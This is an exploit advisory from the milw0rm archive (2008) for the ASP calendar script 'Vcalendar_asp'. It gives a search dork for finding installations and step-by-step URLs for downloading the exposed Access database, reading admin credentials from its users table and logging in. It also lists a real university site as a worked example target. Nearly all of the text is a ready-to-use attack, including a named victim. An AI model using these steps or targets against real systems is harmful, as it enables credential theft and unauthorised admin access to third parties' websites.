[ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [+] Vcalendar_asp Mdb Vulnerability [+] [+] ---------------------------------------------------------- [+] Author : Swan [+] [+] Date : 20.11.2008 [+] [+] Contact : Swantska@Gmail.Com [+] [+] ----------------------------------------------------------- Script : Vcalendar_asp Download : http://www.aspindir.com/indir.asp?id=4048&sIslem=Indir Dork : "inurl:vcalendar_asp" Our mdb path : db/VCalendar.mdb Exploit : Step 1 - http://www.[target].com/[path]/vcalendar_asp/db/VCalendar.mdb Step 2 - Download that mdb file and read admin name & pass from "users" table. Step 3 - http://www.[target].com/[path]/vcalendar_asp/login.asp Example : http://www.soest.hawaii.edu/asp/vcalendar_asp/index.asp http://www.soest.hawaii.edu/asp/vcalendar_asp/db/VCalendar.mdb http://www.soest.hawaii.edu/asp/vcalendar_asp/login.asp [+] ---------------------------------------------------------------------- [+] Special Thanks : str0ke & Turkish Nation [+] [+] Zone-h.Org & Milw0rm.Com [+] [+] ---------------------------------------------------------------------- [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] # milw0rm.com [2008-11-20]